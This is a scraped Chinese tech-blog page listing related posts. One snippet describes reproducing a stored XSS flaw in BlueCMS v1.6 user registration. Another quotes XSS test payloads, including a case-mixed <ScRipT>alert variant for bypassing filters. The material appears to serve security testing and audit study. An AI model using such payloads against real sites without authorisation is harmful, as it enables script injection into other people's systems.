https://mp.weixin.qq.com/s/gunmk1ox62sg2ifmVLFy7A
代码审计:bluecms 用户注册xss漏洞复现
qq_43233085的博客
03-16 1209
代码审计:bluecms 用户注册xss漏洞复现bluecms代码审计漏洞复现 bluecms BlueCMS是一款专注于地方门户网站建设解决方案,基于PHP+MySQL的技术开发,全部源码开放。 复现版本为bluecmsv1.6版本,各位可自行下载。 代码审计 这次不用Seay挖xss漏洞,我们通过关键功能测试来审计xss漏洞。 在后台->会员管理->会员列表处,管理员是可以查看会员...
DOM型XSS漏洞测试payload大全
</script>`:这是一个基本的JavaScript弹窗payload,如果被执行,将在用户浏览器中显示一个包含数字123的警告框。 2. `<ScRipT>alert("XSS");</ScRipT>`:尝试不同的字符编码以绕过过滤机制。 3. `<script>alert(...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值